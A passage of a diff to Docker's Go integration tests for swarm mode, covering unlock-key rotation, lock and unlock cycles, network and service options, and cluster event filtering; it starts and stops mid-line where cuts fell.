checker.NotNil, check.Commentf("out: %v", string(out))) - c.Assert(string(out), checker.Contains, "invalid key") + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "invalid key", + }) outs, _ = d.Cmd("node", "ls") c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") - cmd = d.command("swarm", "unlock") + cmd = d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(newUnlockKey) - out, err = cmd.CombinedOutput() - c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + icmd.RunCmd(cmd).Assert(c, icmd.Success) - info, err = d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) outs, err = d.Cmd("node", "ls") c.Assert(err, checker.IsNil) @@ -1025,185 +1366,193 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { } } -func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) { - d := s.AddDaemon(c, true, true) +// This differs from `TestSwarmRotateUnlockKey` because that one rotates a single node, which is the leader. +// This one keeps the leader up, and asserts that other manager nodes in the cluster also have their unlock +// key rotated. +func (s *DockerSwarmSuite) TestSwarmClusterRotateUnlockKey(c *check.C) { + d1 := s.AddDaemon(c, true, true) // leader - don't restart this one, we don't want leader election delays + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) - // Create a service - name := "top" - _, err := d.Cmd("service", "create", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top") - c.Assert(err, checker.IsNil) + outs, err := d1.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + c.Assert(outs, checker.Contains, "docker swarm unlock") - // We need to get the container id. - out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } - // Compare against expected output. - expectedOutput := "1.2.3.4\texample.com" - out, err = d.Cmd("exec", id, "cat", "/etc/hosts") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) -} + c.Assert(unlockKey, checker.Not(checker.Equals), "") -func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) + outs, err = d1.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") - // Manager Addresses will always show Node 1's address - expectedOutput := fmt.Sprintf("Manager Addresses:\n 127.0.0.1:%d\n", d1.port) + // Rotate multiple times + for i := 0; i != 3; i++ { + outs, err = d1.Cmd("swarm", "unlock-key", "-q", "--rotate") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + // Strip \n + newUnlockKey := outs[:len(outs)-1] + c.Assert(newUnlockKey, checker.Not(checker.Equals), "") + c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey) - out, err := d1.Cmd("info") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput) - - out, err = d2.Cmd("info") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput) + d2.Restart(c) + d3.Restart(c) - out, err = d3.Cmd("info") - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, expectedOutput) -} + for _, d := range []*daemon.Daemon{d2, d3} { + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) -func (s *DockerSwarmSuite) TestSwarmServiceInspectPretty(c *check.C) { - d := s.AddDaemon(c, true, true) + outs, _ := d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") - name := "top" - out, err := d.Cmd("service", "create", "--name", name, "--limit-cpu=0.5", "busybox", "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) + cmd := d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + result := icmd.RunCmd(cmd) + + if result.Error == nil { + // On occasion, the daemon may not have finished + // rotating the KEK before restarting. The test is + // intentionally written to explore this behavior. + // When this happens, unlocking with the old key will + // succeed. If we wait for the rotation to happen and + // restart again, the new key should be required this + // time. + + time.Sleep(3 * time.Second) + + d.Restart(c) + + cmd = d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + result = icmd.RunCmd(cmd) + } + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "invalid key", + }) + + outs, _ = d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + cmd = d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(newUnlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") + } - expectedOutput := ` -Resources: - Limits: - CPU: 0.5` - out, err = d.Cmd("service", "inspect", "--pretty", name) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) + unlockKey = newUnlockKey + } } -func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) { +func (s *DockerSwarmSuite) TestSwarmAlternateLockUnlock(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + var unlockKey string + for i := 0; i < 2; i++ { + // set to lock + outs, err := d.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + c.Assert(outs, checker.Contains, "docker swarm unlock") - out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } - out, err = d.Cmd("service", "create", "--network=foo", "--name", "top", "busybox", "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(unlockKey, checker.Not(checker.Equals), "") + checkSwarmUnlockedToLocked(c, d) - // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + cmd := d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) - out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("swarm", "update", "--autolock=false") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + checkSwarmLockedToUnlocked(c, d, unlockKey) + } } -// TODO: migrate to a unit test -// This test could be migrated to unit test and save costly integration test, -// once PR #29143 is merged. -func (s *DockerSwarmSuite) TestSwarmUpdateWithoutArgs(c *check.C) { +func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) { d := s.AddDaemon(c, true, true) - expectedOutput := ` -Usage: docker swarm update [OPTIONS] + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top") + c.Assert(err, checker.IsNil) -Update the swarm + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) -Options:` + // We need to get the container id. + out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) - out, err := d.Cmd("swarm", "update") - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) - c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) + // Compare against expected output. + expectedOutput := "1.2.3.4\texample.com" + out, err = d.Cmd("exec", id, "cat", "/etc/hosts") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) } -func (s *DockerTrustedSwarmSuite) TestTrustedServiceCreate(c *check.C) { - d := s.swarmSuite.AddDaemon(c, true, true) - - // Attempt creating a service from an image that is known to notary. - repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") - - name := "trusted" - serviceCmd := d.command("-D", "service", "create", "--name", name, repoName, "top") - s.trustSuite.trustedCmd(serviceCmd) - out, _, err := runCommandWithOutput(serviceCmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) - - out, err = d.Cmd("service", "inspect", "--pretty", name) - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) - - // Try trusted service create on an untrusted tag. +func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) - repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) + // Manager Addresses will always show Node 1's address + expectedOutput := fmt.Sprintf("Manager Addresses:\n 127.0.0.1:%d\n", d1.SwarmPort) - name = "untrusted" - serviceCmd = d.command("service", "create", "--name", name, repoName, "top") - s.trustSuite.trustedCmd(serviceCmd) - out, _, err = runCommandWithOutput(serviceCmd) + out, err := d1.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + out, err = d2.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) - out, err = d.Cmd("service", "inspect", "--pretty", name) - c.Assert(err, checker.NotNil, check.Commentf(out)) + out, err = d3.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) } -func (s *DockerTrustedSwarmSuite) TestTrustedServiceUpdate(c *check.C) { - d := s.swarmSuite.AddDaemon(c, true, true) - - // Attempt creating a service from an image that is known to notary. - repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") - - name := "myservice" - - // Create a service without content trust - _, err := d.Cmd("service", "create", "--name", name, repoName, "top") - c.Assert(err, checker.IsNil) +func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) { + d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "inspect", "--pretty", name) + out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo") c.Assert(err, checker.IsNil, check.Commentf(out)) - // Daemon won't insert the digest because this is disabled by - // DOCKER_SERVICE_PREFER_OFFLINE_IMAGE. - c.Assert(out, check.Not(checker.Contains), repoName+"@", check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - serviceCmd := d.command("-D", "service", "update", "--image", repoName, name) - s.trustSuite.trustedCmd(serviceCmd) - out, _, err = runCommandWithOutput(serviceCmd) + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Contains, "foo:bar") + c.Assert(strings.TrimSpace(out), checker.Contains, "com.docker.network.ipam.serial:true") - out, err = d.Cmd("service", "inspect", "--pretty", name) + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--network=foo", "--name", "top", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) - - // Try trusted service update on an untrusted tag. - - repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) - serviceCmd = d.command("service", "update", "--image", repoName, name) - s.trustSuite.trustedCmd(serviceCmd) - out, _, err = runCommandWithOutput(serviceCmd) + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Contains, "foo:bar") + c.Assert(strings.TrimSpace(out), checker.Contains, "com.docker.network.ipam.serial:true") } // Test case for issue #27866, which did not allow NW name that is the prefix of a swarm NW ID. @@ -1252,3 +1601,462 @@ func (s *DockerSwarmSuite) TestSwarmNetworkCreateDup(c *check.C) { } } } + +func (s *DockerSwarmSuite) TestSwarmPublishDuplicatePorts(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--publish", "5005:80", "--publish", "5006:80", "--publish", "80", "--publish", "80", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + // Total len = 4, with 2 dynamic ports and 2 non-dynamic ports + // Dynamic ports are likely to be 30000 and 30001 but doesn't matter + out, err = d.Cmd("service", "inspect", "--format", "{{.Endpoint.Ports}} len={{len .Endpoint.Ports}}", id) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "len=4") + c.Assert(out, checker.Contains, "{ tcp 80 5005 ingress}") + c.Assert(out, checker.Contains, "{ tcp 80 5006 ingress}") +} + +func (s *DockerSwarmSuite) TestSwarmJoinWithDrain(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Drain") + + out, err = d.Cmd("swarm", "join-token", "-q", "manager") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + token := strings.TrimSpace(out) + + d1 := s.AddDaemon(c, false, false) + + out, err = d1.Cmd("swarm", "join", "--availability=drain", "--token", token, d.SwarmListenAddr()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Drain") + + out, err = d1.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Drain") +} + +func (s *DockerSwarmSuite) TestSwarmInitWithDrain(c *check.C) { + d := s.AddDaemon(c, false, false) + + out, err := d.Cmd("swarm", "init", "--availability", "drain") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + out, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Drain") +} + +func (s *DockerSwarmSuite) TestSwarmReadonlyRootfs(c *check.C) { + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top", "--read-only", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.ReadOnly }}", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") + + containers := d.ActiveContainers(c) + out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.HostConfig.ReadonlyRootfs}}", containers[0]) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") +} + +func (s *DockerSwarmSuite) TestNetworkInspectWithDuplicateNames(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "foo" + options := types.NetworkCreate{ + CheckDuplicate: false, + Driver: "bridge", + } + + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + n1, err := cli.NetworkCreate(context.Background(), name, options) + c.Assert(err, checker.IsNil) + + // Full ID always works + out, err := d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + // Name works if it is unique + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + n2, err := cli.NetworkCreate(context.Background(), name, options) + c.Assert(err, checker.IsNil) + // Full ID always works + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n2.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n2.ID) + + // Name with duplicates + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "2 matches found based on name") + + out, err = d.Cmd("network", "rm", n2.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Dupliates with name but with different driver + options.Driver = "overlay" + + n2, err = cli.NetworkCreate(context.Background(), name, options) + c.Assert(err, checker.IsNil) + + // Full ID always works + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID) + + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n2.ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, n2.ID) + + // Name with duplicates + out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "2 matches found based on name") +} + +func (s *DockerSwarmSuite) TestSwarmStopSignal(c *check.C) { + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top", "--stop-signal=SIGHUP", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.StopSignal }}", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "SIGHUP") + + containers := d.ActiveContainers(c) + out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.StopSignal}}", containers[0]) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "SIGHUP") + + out, err = d.Cmd("service", "update", "--detach", "--stop-signal=SIGUSR1", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.StopSignal }}", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "SIGUSR1") +} + +func (s *DockerSwarmSuite) TestSwarmServiceLsFilterMode(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top1", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top2", "--mode=global", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 2) + + out, err = d.Cmd("service", "ls") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "top1") + c.Assert(out, checker.Contains, "top2") + c.Assert(out, checker.Not(checker.Contains), "localnet") + + out, err = d.Cmd("service", "ls", "--filter", "mode=global") + c.Assert(out, checker.Not(checker.Contains), "top1") + c.Assert(out, checker.Contains, "top2") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "ls", "--filter", "mode=replicated") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "top1") + c.Assert(out, checker.Not(checker.Contains), "top2") +} + +func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedDataPathAddr(c *check.C) { + d := s.AddDaemon(c, false, false) + + out, err := d.Cmd("swarm", "init", "--data-path-addr", "0.0.0.0") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "data path address must be a non-zero IP") + + out, err = d.Cmd("swarm", "init", "--data-path-addr", "0.0.0.0:2000") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "data path address must be a non-zero IP") +} + +func (s *DockerSwarmSuite) TestSwarmJoinLeave(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("swarm", "join-token", "-q", "worker") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + token := strings.TrimSpace(out) + + // Verify that back to back join/leave does not cause panics + d1 := s.AddDaemon(c, false, false) + for i := 0; i < 10; i++ { + out, err = d1.Cmd("swarm", "join", "--token", token, d.SwarmListenAddr()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + _, err = d1.Cmd("swarm", "leave") + c.Assert(err, checker.IsNil) + } +} + +const defaultRetryCount = 10 + +func waitForEvent(c *check.C, d *daemon.Daemon, since string, filter string, event string, retry int) string { + if retry < 1 { + c.Fatalf("retry count %d is invalid. It should be no less than 1", retry) + return "" + } + var out string + for i := 0; i < retry; i++ { + until := daemonUnixTime(c) + var err error + if len(filter) > 0 { + out, err = d.Cmd("events", "--since", since, "--until", until, filter) + } else { + out, err = d.Cmd("events", "--since", since, "--until", until) + } + c.Assert(err, checker.IsNil, check.Commentf(out)) + if strings.Contains(out, event) { + return strings.TrimSpace(out) + } + // no need to sleep after last retry + if i < retry-1 { + time.Sleep(200 * time.Millisecond) + } + } + c.Fatalf("docker events output '%s' doesn't contain event '%s'", out, event) + return "" +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsSource(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, false) + + // create a network + out, err := d1.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + networkID := strings.TrimSpace(out) + c.Assert(networkID, checker.Not(checker.Equals), "") + + // d1, d2 are managers that can get swarm events + waitForEvent(c, d1, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount) + waitForEvent(c, d2, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount) + + // d3 is a worker, not able to get cluster events + out = waitForEvent(c, d3, "0", "-f scope=swarm", "", 1) + c.Assert(out, checker.Not(checker.Contains), "network create ") +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsScope(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a service + out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + serviceID := strings.Split(out, "\n")[0] + + // scope swarm filters cluster events + out = waitForEvent(c, d, "0", "-f scope=swarm", "service create "+serviceID, defaultRetryCount) + c.Assert(out, checker.Not(checker.Contains), "container create ") + + // all events are returned if scope is not specified + waitForEvent(c, d, "0", "", "service create "+serviceID, 1) + waitForEvent(c, d, "0", "", "container create ", defaultRetryCount) + + // scope local only shows non-cluster events + out = waitForEvent(c, d, "0", "-f scope=local", "container create ", 1) + c.Assert(out, checker.Not(checker.Contains), "service create ") +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsType(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a service + out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + serviceID := strings.Split(out, "\n")[0] + + // create a network + out, err = d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + networkID := strings.TrimSpace(out) + c.Assert(networkID, checker.Not(checker.Equals), "") + + // filter by service + out = waitForEvent(c, d, "0", "-f type=service", "service create "+serviceID, defaultRetryCount) + c.Assert(out, checker.Not(checker.Contains), "network create") + + // filter by network + out = waitForEvent(c, d, "0", "-f type=network", "network create "+networkID, defaultRetryCount) + c.Assert(out, checker.Not(checker.Contains), "service create") +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsService(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a service + out, err := d.Cmd("service", "create", "--no-resolve-image", "--name", "test", "--detach=false", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + serviceID := strings.Split(out, "\n")[0] + + // validate service create event + waitForEvent(c, d, "0", "-f scope=swarm", "service create "+serviceID, defaultRetryCount) + + t1 := daemonUnixTime(c) + out, err = d.Cmd("service", "update", "--force", "--detach=false", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // wait for service update start + out = waitForEvent(c, d, t1, "-f scope=swarm", "service update "+serviceID, defaultRetryCount) + c.Assert(out, checker.Contains, "updatestate.new=updating") + + // allow service update complete. This is a service with 1 instance + time.Sleep(400 * time.Millisecond) + out = waitForEvent(c, d, t1, "-f scope=swarm", "service update "+serviceID, defaultRetryCount) + c.Assert(out, checker.Contains, "updatestate.new=completed, updatestate.old=updating") + + // scale service + t2 := daemonUnixTime(c) + out, err = d.Cmd("service", "scale", "test=3") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out = waitForEvent(c, d, t2, "-f scope=swarm", "service update "+serviceID, defaultRetryCount) + c.Assert(out, checker.Contains, "replicas.new=3, replicas.old=1") + + // remove service + t3 := daemonUnixTime(c) + out, err = d.Cmd("service", "rm", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitForEvent(c, d, t3, "-f scope=swarm", "service remove "+serviceID, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsNode(c *check.C) { + d1 := s.AddDaemon(c, true, true) + s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + d3ID := d3.NodeID() + waitForEvent(c, d1, "0", "-f scope=swarm", "node create "+d3ID, defaultRetryCount) + + t1 := daemonUnixTime(c) + out, err := d1.Cmd("node", "update", "--availability=pause", d3ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // filter by type + out = waitForEvent(c, d1, t1, "-f type=node", "node update "+d3ID, defaultRetryCount) + c.Assert(out, checker.Contains, "availability.new=pause, availability.old=active") + + t2 := daemonUnixTime(c) + out, err = d1.Cmd("node", "demote", d3ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitForEvent(c, d1, t2, "-f type=node", "node update "+d3ID, defaultRetryCount) + + t3 := daemonUnixTime(c) + out, err = d1.Cmd("node", "rm", "-f", d3ID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // filter by scope + waitForEvent(c, d1, t3, "-f scope=swarm", "node remove "+d3ID, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + + // create a network + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + networkID := strings.TrimSpace(out) + + waitForEvent(c, d, "0", "-f scope=swarm", "network create "+networkID, defaultRetryCount) + + // remove network + t1 := daemonUnixTime(c) + out, err = d.Cmd("network", "rm", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // filtered by network + waitForEvent(c, d, t1, "-f type=network", "network remove "+networkID, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsSecret(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + waitForEvent(c, d, "0", "-f scope=swarm", "secret create 